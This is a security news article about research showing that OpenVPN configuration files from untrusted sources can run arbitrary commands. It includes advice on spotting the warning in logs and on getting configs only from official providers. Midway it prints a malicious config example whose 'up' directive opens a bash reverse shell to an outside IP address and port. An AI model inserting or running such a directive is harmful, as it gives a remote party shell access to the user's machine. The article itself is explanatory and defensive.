Open VPN config backdoor dangers found lurking

OpenVPN Config

A security researcher has discovered that the once recommended method of using OpenVPN configuration files could cause more harm than good allowing full backdoor access to your system.

OpenVPN is one of the most widely used VPN protocols in existence today and if you’re using a VPN service there’s a good chance you’ll be making connection via OpenVPN without even knowing.

Depending on how you make connection and where you source your configuration files from could open you up to a host of serious security issues.

Understanding OpenVPN

To make connection to a VPN server, OpenVPN requires certain commands essentially to know where to connect to but also what other parameters or ‘features’ it should use when making that connection.

Most commercial VPN providers that you use such as ExpressVPN, IPVanish and others have created custom software or apps that do all of this automatically but users who are extra cautious often choose to go it alone.

It’s possible to install the OpenVPN client directly and use individual configuration files to connect. The benefit of this is you don’t need to trust that the provider’s app is legitimate and isn’t carrying out unwelcomed tasks behind the scenes.

While most commercial VPN providers will be reputable and only interested in making connection as smooth as possible, there are others such as ‘free’ VPN services who have more to gain by carrying out additional tasks such as utilising your computer for crypto-mining etc.

Using OpenVPN directly would mitigate against this but as research has shown, it could open you up to other security issues.

Why OpenVPN configs can be dangerous

Security researcher Jacob Baines took up the challenge of investigating OpenVPN configuration files after a user of Stack Exchange posed the question of if OpenVPN config files known as ‘.ovpn’ files were dangerous to use from unknown sources.

Often free or sketchy VPN services won’t offer custom software or apps but will instead offer basic configuration files for OpenVPN directly.

Baines discovered that OpenVPN config files can be used to attach malicious commands which essentially allowed an unlimited number of actions to be carried out on the user’s system or device.

A simple OpenVPN config file is made up of nothing but readable commands, eg;

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

However, Braines discovered that it’s simple to append additional commands not intended for OpenVPN to the end of the configuration file.

His research led him to add:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

To the configuration file which opens up a backdoor to the user’s computer after the VPN connection has been established.

Baines went on to say that the user is unlikely to be aware that anything funny is happening behind the scenes because the OpenVPN connection is complete and the user for all intents and purposes is protected by the VPN connection.

Behind the scenes it’s a different story as the creator of the OpenVPN config could now in theory gain access remotely to the user’s system and issue further commands.

The only record of the incident taking place would be in the OpenVPN log files which record what commands were issued. By this point it would however be too late as the commands have already been executed. It would also be highly likely that most users would not check such logs or even if they did understand what they were reading.

Baines suggests if you see a line such as “NOTE: the current — script-security setting may allow this configuration to call user-defined scripts” in your log files then you should be highly concerned.

Windows systems not immune

Initial research was carried out on a Linux system which limits the scope of users affected but which in Baines’ words “makes this attack easy”.

He followed up the attack using a Windows system and while the process was a little lengthened to create such a backdoor, it wouldn’t be out of the realms of most malicious users with minor skills to carry out.

Baines notes he hasn’t yet seen this exploit in use, but with millions of OpenVPN configurations and hundreds of illegitimate providers of VPN services, it doesn’t mean it isn’t currently in use or won’t be in the future.

What you can do to protect yourself

Thankfully falling victim to the issue relies solely on you installing either OpenVPN configuration files or software and apps you don’t fully understand the source of.

As a rule of thumb, you should never download OpenVPN configuration files from unknown sources, especially if they are offering free access to VPN services.

Always make use of dedicated reputable VPN software from providers such as ExpressVPN and NordVPN which have configuration files built in. Never download ‘hacked’ or ‘cracked’ VPN clients for popular providers that claim to offer free services.

If you choose to use OpenVPN configuration files then ensure that you’re downloading them from the official website of your VPN provider and not from third party websites.

If you’re unsure of the source of your OpenVPN configuration files then contact your VPN provider directly and ask them for official links to their configuration files.

If you’re confused by all of this then simply use the apps your VPN provider supplies and download them only from their official website.

Leave a Reply

Your e-mail address will not be published. Required fields are marked *